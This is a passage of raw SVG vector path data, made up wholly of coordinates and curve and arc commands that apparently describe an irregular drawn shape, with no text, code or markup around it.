4.8-.1,4.4.2,5.5-.1.9.2,6,.7,2.1.8a44.26,44.26,0,0,0-8.3,0c4.7-.1,8.5.1,11.3.3.3.5,2.4,1.2-3.2,1.1a55.14,55.14,0,0,0-5.9-.4c-1.8.3,4.9.2,4.5.4.4.2-.2.4,1.8.5,3.3-.1-2.8-.5,2.3-.5-.8.4,2.5.5,2.1.8-4.2-.1-4.1.2-8.3,0,.8-.3-5.5-.3-5.8-.2,2.3,0,1.7.8,4.5.4-1.4,0-2-.2-.2-.2.2.2,4,.2,4.4.3-1.5.1-1.4.4-3.8.5-2.3-.1-1.1-.3-3.1-.4-4.8.2,11.3,1.2-.4,1.1-.9-.2,1.2-.5-1.9-.6-4.3.3.3.8-3.2,1.1,3.2,0,5.4.1,5.9.4-4.2-.1-5.4.3-2.2.6-2.7.2-4.7-.2-7,0,3.8.1,3.6.7,4.8.8,0-.1.2-.3,2.6-.2,2.8.3-.9.3.6.7,5.3.2,2-.4,5.2-.4-.9.6,4.4.2,4.3.2,5.7.4-1.8.6-5.1.5,5.5,0,10.2.6,11.3.1-6-.3,2.2-.4-3.5-.8,3.3.1,5.3.1,5.5-.1-3.1-.3-5.9.1-7.3-.4,1.7-.9,14.3.1,13.1.7,2.7-.2,1.8-.2.8-.6,4.9.5,3.1-.1,5.4-.2,3.3.3-.1,1.1,5.3,1.3-.3-.7-1.8-1.4-.1-1.6,7.8.6,4.1,1.4,9,2.3-3.3-.1-5.3-.1-5.5.1,3,.3,2.4.9,5.2,1.2-6.1-.1-2.8.6-2.1.8,1.2-.1,10.6.2,6.8-.2.6.2-4.1-.1-4.3-.2a7,7,0,0,0-1.7-.4c6.7,0,.8-.6,6.4-.6-2.7-.1-3,.1-5.6,0,3.6-1.1,2.1-1.4,3.7-2.1-5.2-.7-7.4-1.9-2.1-2.3a36.81,36.81,0,0,1-4.2-.1c4.8-.1.5-.5.5-1,2.7,0,6.1.1,5.4-.2-6.8,0-4.7-.6-1.9-.6a15.66,15.66,0,0,1-2.9-.2c4,0,5.7.7,7.3.4-3-.1-.8-.5-4.7-.5-.8.1-2.9.1-5.5.1-.3-.3-.5-.6-.8-.9-4.9.1-7.9-.3-9.6.1,3.4.1,2.9-.1,7,0-.2.3,1.2,1-4.9.8,4.4.1-2.6,1.2,4.9.9,0,.2-.6.4-2.4.4-4.5,0-6.7-.2-10-.3a19.29,19.29,0,0,1-3.7.6c-.2-.2-4-.2-4.4-.3,1.6-.2-4.6-.6-.5-.6,2.7.1,1.3.4,4.5.4-.4-.3,4.2-.2,2.2-.7-7.8-.4-10.8-2-1.4-1.6-3.2-.6-2.8-.8-7.4-.5,2.5-.4.2-1.1-3.7-1.1,2.7,0,.7-.3,4-.2,2.9.1-.3.6,4.7.7,4.1.1-1.9-.8,2.2-.7-.2.3,5.6.2,4.6.5-4.3-.3-4.6.1-2.4.4-2.7-.3-4.9-.1-4,.2a36.19,36.19,0,0,1,8.7.4c-.6-.7,1.3-1.3,1.2-1.8-.5.2-3.1-.4-6-.5-2.6-.9,3.7-.9,1.2-1.8,2.4.4,5.6-.1,7.2.3-4.3-.1-3.3.8-2.1.8a15.37,15.37,0,0,1,2.8.1c-5.2-1.2,11.7-1,9.7,0a52.3,52.3,0,0,0-5.6,0c1.1.3-1.6.7,3.4.7-3-.9,6.9-.1,10.6-.6-.7-.1-6.1-.1-7.4-.5,3.4-.2,8.1.3,9.8.1-2-.4-6.1-.3-8.8-.5.5-.4,4.6-.6,6.9-.1-.5-.3.3-.4,2.3-.5.1.1,2.6.2,3.1.3.2,1-.3,1.7-1.5,2.4.8-.1,2.1-.1,2.2.1-.1.3-1.4.5-3.7.6,5.7.1,3.2.1,3.1.4,2.7.1,3-.1,5.6,0,.4.7,4.7,1.3,0,1.5a82.23,82.23,0,0,0-11.1,0c-5.7-.9,2-1.7-.7-2.3-3.4.1-2.3.7-6.3.7-.4-.8,7-.9,7.1-1.4a73,73,0,0,0-12,.6c-8.2,0-2.8-1-11-1.4,1.3.6,3.9,1.3,10,1.9-6.8.2-5.2.7-7.2,1.3,5.5-.1.8-.3,8.4.1,1.7-.2-4-.5-.4-.4s2.8.6,6.3.8c-2.3.2-2.9.3-.8.6,3.4.1,5.3-.5,9.7,0-3.8.4.5.2,2,.7-1.3.3-4.8-.1-5.3.3,4.5,0,8.1.8,4.9.9-2.7-.1-1.3-.4-4.3-.2,6.3.5,1.5.8,7.8.9-4.2.4,2,.7-1.8,1.2,3.7.2,4.4,0,5.8.2-4.6.2,6.1.7.8.9-.3-.1,0-.3-1.7-.4,2,.7-5.3-.1-5.3.3,9.2.5,10.2,2.1-3,1.4,1-.2-1.8-.7-3.1-.4,2.1.1,1.5.3,1.8.5,7.2.4,11.5.7,7.9,1.1-1.6-.1-6.9-.6-8.6-.3,7,.2-1.4.4-.8.6a53.87,53.87,0,0,1,8.8.5c2.1,0,5.4-.4,6.8-.2.1.3-2.3.3.5.6-1.9,0-3.8-.1-5.7-.1,8.3,1.1,3.6,1.5,2.1,2.3,5.1.2.2.4,3.3.6a13.76,13.76,0,0,1,4.1-.1c1.5.5-6.6.4-2,.9-3.2-.1-5.3-.1-5.5.1,5.4.1,1.4.5,7.3.4-2.8.2.7.4,2,.7,4.9-1.5-2.8-3.3,4.1-4.8a36.81,36.81,0,0,1-4.2-.1c-.9-.5,4.3-.6,1.8-1.2-6.7-.2,1.3.4-2.5.3-5.1-.5-2.2-.8-2.6-1.4a43.87,43.87,0,0,0,5.5-.1c-.8.4-6.2.4-.6.8-.5-.3,3.8-.6.7-.9,1.2-.1,1.3-.3-.4-.5.1.3-4.7-.1-4.4-.2,2.8-.3-3.1-.7,2.1-.7.5.4-.6.8,4.9.9-.1-.7-1.3-1,1.7-1.3-3.1,0-4.6-.2-4.5-.4,7.5-.2-1.9-1.3-4.2-1.6,3.7-.1,5.6-.3,7.9-.5a36.81,36.81,0,0,1-4.2-.1c0-.3,3.3-.4,5.1-.5-7.7-.2-3-.4-6.4-1,2,.1,2.5.2,4.4.3.6-.4-2.7-1.1.3-1.2a33.79,33.79,0,0,1,4.5.3c1.4-.1.1-.4,4-.2-1.5-.2-1-.6-3.4-.7-3,.1-2.7.6-7.9.5,1.7-.4,2.9-.1-1.8-.5,4.1,0,4.6-.5,8.4.1-.2-.3-1.4-.7,2.3-.6,1.3.3,3.4.5,3.5.8a43.14,43.14,0,0,1,8.8.5c1.9-.3-1.5-.6-4.9-.9a13.45,13.45,0,0,1-4.2,0c1.9-.2-1.8-.4,2.4-.5-2.1-.1-5.2-.1-5.8-.2.6-.1,1.3-.2,2.5-.3,8.9.5,11.6,1.1,12.7,1.8,2.1.1,7.2,0,7.2.3-1.9,0-1.1.2-2.6.2-4.9,0-7.5-.4-8.4-.1,15.2.5,10.2,1.8,7.5,2.2-.1.3,3.8-.2,4.4.2-.7.4-3.7.9-1.7,1.3-1.6,0-4.1-.1-4.1,0,10.7.6-1.5,1.9,3.5,2.4-.2-.1.4-.3,1.3-.1.5.4-7,0-6.6.4,3.4.2,5.8-.3,7,0-4.7.1.2.1,1.8.5-3,.1-2.2.6-5.2.4,10.3,1-1.4,1.7.7,2.4-5.3-.1-5.1.3-6.4.6,5.3.2,2.2-.5,6.6-.4-1.7,1,5.6,2.5,10.1,3.6-3.8,0-3.1-.3-5.9-.4-.7.4,5.6.4,6.2.7-5.7.4-13.7.9-4.1,1.7.1-.2-.9-.4,1-.4.2.3,7.9,1.3,1.4,1.6-2-.2-5.4-.2-6-.5,1.8,0,2.4-.2,2.4-.4-4.4,0-4-.4-7.4-.5-1.7.4,4.1.3,3.3.6-3.9-.1-3-.2-5.7-.1,3.3.2,4.4,1,7.7.8-6,.2,3.5,1.2-2.9,1.5-3.6-.2,3.3-.5-3.3-.6-.8.2-.5.6.8.9,6.3.2-1.3-.2,2.6-.2,6.2.1,5.4,1.2,9.2,1-6-.8-.1-1.5-5.7-1.8,3.7-.2,4.2-.6,9.1-.7.1.4.8.3,2.3,1-4.2,0-13.5.6-2,.8-1.5-.4.9-.5,3.8-.5-3.1.3,4.8.6.8.9,6.3.1.8-.9-1-1.1,1.8,0,2.1.2,4.4.2-3.6-1.5.8-2.2,5.5-3.3-7.3-.2-4,.6-10.6.5-.1-.1-1.3-.2-1.6-.3,4.5.1,4.5-.3,3.6-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.5-.6.8-1.1-3.9-1.3,2.9.1-3.7-.8.7-.7.9.1,4.7.5,5.8.2-4.4-.3-4.7-.8-5.3-1.3a53.22,53.22,0,0,0,6.8-.2c-2.5-.4-6.4.1-8.6-.3,5.5-.1.3-1,7.4-1.1-3.6,0-5.2-.2-4.6-.4,1.7.1,9.6.4,5.7.1-5.1,0-4.2-.9-.7-.8-.2.9,8.5.6,10.9,1.3a24.32,24.32,0,0,1-2.7,0c-2.8-.1-2.1-.3-5.9-.3-.3.5-3.8.4.8.9a45.4,45.4,0,0,1-6.9.1c-.2.4,7,.4,7.6.7.3.3-2.2.3-.8.6-1.4,0-2.8-.1-4.2-.1,3.2.6-.3.2,4.9.9-1.5.4-5.5.4-9.4.3,1.2.2,7.9.1,8.7.4.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c4.6.2,4.2-.1,7.1.2-4.9-1.3,3.4-2.1-2.9-3.2,1.6-.1,3.7-.1,7,0-1.5-.6-2.7-1.1-4.5-.4-.9-.2-2.3-.3-3.2-.5,6.2.1,6.6-.4,2.3-.5,5,.1-3.3-.4,1.1-.3,4.4-.1,3.8.6,6.5,1,3.9-.3-1.6-1.2-2.9-1.7,6.4.6-.6-.8,3.5-.8,2.4.1,3.5.8,6,.5-4.7-.5-2.6-1-9.7-1.5,9.2-.4-10.1-2.1,1.8-2.7-4.4-.3-2.6-.8-.9-1,3.2.1-.2.6,6.1.6-.8-.4-3-.7-6.3-.9.2-.2,3.6-.1,3.9-.3-2.6-.1-5.4-.7-3.3-.6,1.7.1,1.7.2,1.7.4a29.51,29.51,0,0,0,5.4-.2c-2.1-.1-5.2-.1-5.8-.2a76.33,76.33,0,0,0,12.9-1.1c-7.2-.2,2.2-.6-6.2-.7,0,.4,4.5,1.1-.9.5-3.2.2,2.6.7-.6.9-.9,0-1.9,0-2.9-.1-1.2-.6,6.9-.8,1.5-1.5-.1.1.5.3-1.1.3-.1-.1-1.3-.2-1.6-.3.4-.2,5.4,0,3.9-.3-7.6.2-.1-1.1-10.9-1.3,5.1-.1-1.1-.2-.6-.7a24.32,24.32,0,0,1,2.7,0c2.6.1,5.3.7,7.3.4-3.5-.1,0-.7-4.8-.8,1.2.2-2.4.4-2.6.2-1.8-.5,8.2-.3,2.1-.8a8.77,8.77,0,0,1-2.8,0c4.1-.4.9-.9,1.6-1.4,2.1.3,2.2.8,6.5,1-1.4-.5.1-.7,3.5-.8-5.1-.2-7,.1-8.6-.3,4.2.1,1.1-.6,5.1-.5-4.8.1-7.6-.5-8.6-.3,5.3.4-3.5,0-2.6.2,2.3,0,2.8.7.5.6.4-.3-3.5-.9-4.7-.7,3.5.1.6.4-1.1.3-3.3-.3.4-.3-.6-.7-2.7-.2-4.5.2-5.7-.1.6-.6,4.6-1,1.1-1.9,3.8.5,5.1-.5,8.3,0-2,.2-3.5.8,2.4,1.1-2-.6-3.2-1.6,1.2-1.8,2.1.7,1,.8-1.7,1.3,7.7.1,9.3.4,17.3.7.8-.3-4.6-.9-4.9-.8-1.6.2,5.9.5,1.8.5a36,36,0,0,1-7.6-.7c4.5-.1.6-.4,2.1-.8,5.7.3,2.7-.2,5.4-.2,2.8.3.4.3.5.6,8.8.1-.3-.4-.7-.8,2.5,0,4.4.1,5.8.2a9.4,9.4,0,0,0-3.2-.5c-1.5.5-12.5-.4-10.5-.9a54.5,54.5,0,0,1,7,0c.1-.2-1.8-.3-1.8-.5,5.1.1,3.5-.4,8.1-.3-2-.5-.4-.5-4.8-.8-4.1,0-.1.4-2.5.4-2.2-.1-5.6-.7-2-.7,4.6.1,7.7.5,8.3,0-7.3.1-1.1-.2-4.5-.4a87.83,87.83,0,0,1-9.6.1c-1.1-.7,1.9-.8,1.7-1.2,1.8.3,1.6.8,5,1,4.9-.4-3.4-1.4,2.8-1.6-3.5.4,3.8.5,6.3.9,1.7-.2,4.5.3,5.6,0a41.63,41.63,0,0,1-6-.5c4.4,0,6-.5,9.5-.2-2.3-.6-8.7-1.4-.2-1.8,1.5.2-3.9.3.4.4a3.3,3.3,0,0,1,1.4,0c.8.3-6.5-.2-4,.2,7.2.3,6.1,1.1,9.8,1.6-3.9-.2-2.6.2-4,.2,3.4-.1,3.9.6,5.8.2-5.3-.3,2.2-.3.9-.5-6.7-.3,1.5-.7-3.9-1.3,2.1.1,5.2.1,5.8.2-.4.1-3.1.3.4.4.2-.3,1.9-.4.7-.7-2.5,0-3.4-.2-3.1-.4a42.45,42.45,0,0,1-7.3-.4c4.4,0,6,.4,7,0-6.1-.3-10.4-.7-14.8-1.1a37.36,37.36,0,0,0,5.5-.1,4,4,0,0,0,1.6.3c-1.9-.6,4.9.3,5.5-.1-9.7-.4-2.6-.4-9.2-1,4.7.2,3,.2,5.6,0,.7.6.3.1,4.3.2.1.1,1.3.2,1.6.3-4.1-.3-3.5.4-1,.4a83,83,0,0,1,8.5.2,36.57,36.57,0,0,0-8-1.2c.8-.5,1.5-.9,7.8-.6.5.3-2.9.2-3.9.3,3.9.5,5.4,1,8.2,1.4-2.5-.4,5.9-.2,5.6,0-1.6.3-5.8.7-.7.7-7.8,0-4,.8-10.4.7-.3.4,3.9.5,6.2.7-3.6-.1-1.9.4-3.8.5a38.81,38.81,0,0,0-6.9.1c4.4.1-2,.7,1.8.5.6-.1,1.3-.2,2.5-.3-.4.3,2.4.5,3.4.7,4.8.2,1.8-.4,8.2-.1-.6.2-.3.4-2.4.5-1.1-.3-2.5.2-5.5.1,2.2.5.4.5,1,1.1,7.5.2.4-.5,2-.9,10.8.2,9-.7,17.4-.7-1.7-.4-6.7-.5-2-.7-2.3-.1-4.7-.1-7.1-.2-.4.3,4.6.3,3.4.7a17.57,17.57,0,0,1-3.9.4,30,30,0,0,1-3.6-1c4.5.1,1.7-.4,4.3-.4-8.9,0-4.1.8-12.1,1,1.8-.5,2.6-1.3,12.5-1.6-.5-.2-2.3,0-2.9-.2,1.4,0,1.6-.2-.2-.2.9.2-3.3.5-4,.2,1.8-.2,1.7-.7,4.9-.8,2.9.1,1.7.4,4.6.5.6-.1,1.8-.2,2.5-.4-2.8-.1-9.4-.5-4.8-.7,2.7.7,2.1-1,9.3-.4-.8-.3-4.8-.4-3.5-.8,6.2.4,2.4-.1,5.4-.2,3.2,1.3,6.6,3.1-2.7,3.2,1.8.7,1,1,2.7,1.5,1.9,0,3.2.1,4.3.2-.5-.4,6-.1,6.6-.4-4.1,0-6.9,0-8.5-.2.9-.3-4.8-.7-.7-.8,1.7.2,1.9.4,2,.7,5.3,0,11.5-.5,7.4-1,.1.3.2.6-3.8.5.7-1.4-7.4-3.4,9.8-3.1-5.5-.3,7.8-.3.7-.7-1.4.1-.1.4-4,.2-1.1-.5-.4.1-4.3-.1a5,5,0,0,1-.6-.7c-6.1-.2-4.2.4-9.4.3,3.8-.7,20.4-1.5,5.1-2.1,0-.1-.1-.1-.2-.2,3.4-.1,6.2.5,7.1.2-2.2-.1-4.6-.3-4.6-.5,6.3.2-1.7-.6,2.1-.7,6.8.6,6.8,1.5,6.1,2.2,1.6.1,2.3.2,3,.3,5.8.3,7-.3,9.8.1-2.6.2-2.7,0,.3.3-3.9,0-5.2.3-4.9.8,7.7.2-.3-.4,3.8-.5,8,1.3-1.1,1.5,2.4,2.7,6.5.3,3.7.7,10.4.8-5.3,0-8.5.3-11.3-.3-1,.3,4.5.9,6.2.7-1.2-.2,3.8.3,3.9-.2a21,21,0,0,1,4.8.8c-2.5.1-2.6-.1-7.1-.2-.4.4-.5.3.7.8,1.9.3,5.1-.1,7.2.3a40.53,40.53,0,0,0-6.4.6c9.2.7,4.1,1.5,4.8,2.3-3.3-.1-9.6,0-5.3.2,1.8-.1,4.6-.2,8.2-.1-2.1.3-4.3.4-.6.9-7.5-.2.5.6-5,.7,2.1.1,7.2,0,7.2.3l.2.2c-5.1-.1-7-.4-11.5-.5-1.7.4,6.4.2,4.6.5,4.1.2,3.5-.1,7,0-1,.5,4.6,1.1-1.5,1.5,5.6.2,3,.5,4.8.8-.9.2-7-.2-5.4.2,2.7,0,3.2.2,5.8.2.1-.1.2-.3,2.7-.2,10.2.6,3.7,1.5,3.2,2-.1.1,7.4,1.2-2.3.6,1.7.3,2.9.8-3.7.6.6-.2,3.2-.2,2.3-.6-4.2-.1-5.1-.4-8.8-.5,1.5.5-4-.3-2.5.3.8.4,7-.1,8.6.3a17.63,17.63,0,0,1-3.9.4c-1.46-.17-2.93-.27-4.4-.3-.6.2-3.2.7-.6.9,2.4,0-.6-.5,2.3-.5,2.7,0,11.7.5,2.9.2-.1.4,8.2.3,6.3.8-2.4,0-3.8-.2-4.3-.1.2.4,3.7,0,6,.5a51.1,51.1,0,0,1-5.4.2c4.4.5-2.2,1.3,6.4.9a3.92,3.92,0,0,1-2.3.5c-1.5-.4-2.2-.2-5.8-.2,1.4.6-.8.9-1.6,1.4,3.3.2,5.1-.2,5.7.1-3.6-.1,2.1.2.4.4-2.1,0-5.3-.2-5.6,0,.5.5,3.4,1.1-1.9,1-.9-.2,1.2-.5-1.9-.6-3.9.3,4.3.8,1,1.1,1.9,0,3.8.1,5.7.1,0,.4,5.7,1-3.5.8,2.7-.4-5.2-1-10.5-.9.1.3,1.4.7-.6.9,2.1.3,4.1-.1,5.8.2-2.1.3,6.3,1.5,3.1,1.9,2.8,0,.7-.5,5.2-.4,5.3.9-3.4,1.6-.9,2.2a37.63,37.63,0,0,1,3.8-.5c2.3.6-2,.9-1.3,1.7.1.1,2.6.2,3,.3-.1.5-7,.9-11.7.9,9.5.3,8.4-.3,12.1-.5,3.8.6-3.6.6,1.1,1.2,2.2,0-.8-.6,3.9-.3-3-1-7.2-2,.6-2.5-2.3.7,1.1.3,4.8.8-.2.3-5.2.7-3.4.9a11.09,11.09,0,0,1,2.7,0c3.5.4-2.9.9.8.9-.2-.2.8-.3,2.5-.3,3.9,1.1-2.2,1.4,4.7,2.2-9.4-.1,2.3,1.7-6.9,1.6-1-1.1.2-1.6-2.1-2.4-3.4.1-2.8-.4-4.7-.7-6.5.4,2.1,1.5,4.6,2.1-1.8,0-1.8.1-4.1,0,.6-.4-2.9-.5-2.2-.9-2.4,0-7.6-.2-6.8.2,2.7.1,3-.1,5.6,0a7.57,7.57,0,0,0,.8.9c-9.5,0-9.1-.2-18.5-.5,0-.1,1.7-.1,1.1-.3-10.1-.2-11.8-.9-16.5-1.4-3.8.3,5.7.5,3.7,1.1a21.29,21.29,0,0,0-4.3-.1c4.4,0,1,.6,6.1.6-.4-.3.3-.4,2.3-.5.2.1,2.6.2,3,.3,1.5.4-1.9.3-2.4.5,1.1.1,2.8.1,2.9.2,5.7.2-1.9-.4,5.4-.2,9.1.7,19.7.5,16.6,1.5-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.8,1-2.8,1.5-3,2.9,3.4.2,5.1-.2,5.7.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7-.4.3-4.2.2-6.7.3,2,.2,5.3.2,7.3.4.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a44.62,44.62,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2A60.14,60.14,0,0,1,434,68.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.52,31.52,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0h0c3.1,1.1,11.5,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4h-1.3c-4.1-.1-5.1-.3-4.9-.7a17.46,17.46,0,0,0,5-.3c1.4-.4,1.6-.8,8.3-.4-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-5.5-.6-3.8-2-7.2-3a23.68,23.68,0,0,0-2.9-.6h3a16,16,0,0,0,2.5-.1,15,15,0,0,1-2.4-.2c-1.6-.2-2.7-.3-5.1-.4,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.91,97.91,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.8-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.15,66.15,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7q1.65.3,4.2.6c1,.1,2.1.2,3.5.3,5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1a24.24,24.24,0,0,1-3.2.3c-2.1.1-3.8.2-1.6.6-.9-.2.2-.2,1.5-.1,1.1.1,2.4.2,2.8.2a5.67,5.67,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.52,31.52,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a27.09,27.09,0,0,1-3.1-.3,17.94,17.94,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.09,41.09,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.06,9.06,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.82,31.82,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a4,4,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.81.2,1.91.3.41.4,11.19.3.19-1.1,0-1.6s10.4,0,9.09-.7a35.68,35.68,0,0,0-4,.1c-2.19-.5-5.59-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.19-.3-6.19-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.59,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-3.7-1.5,5.5-1.6-7.2-1.3-3.3-3.2,2.1-3.9a14.11,14.11,0,0,0,2.9.2c-.4-.3-1.3-.5-3.4-.7-.1.1-.2.3-2.6.2-.7-.8,1.2-.9.1-1.4,2.1.1,3.7.2,5.9.4-2.5-.7,4.1-.6,1.6-1.3-3.9,0-3.7.3-7.1-.2a27.6,27.6,0,0,0,5.3-.3c-2.3-.3-5.8.1-7.3-.4.4-.7-1.2-.7-2.7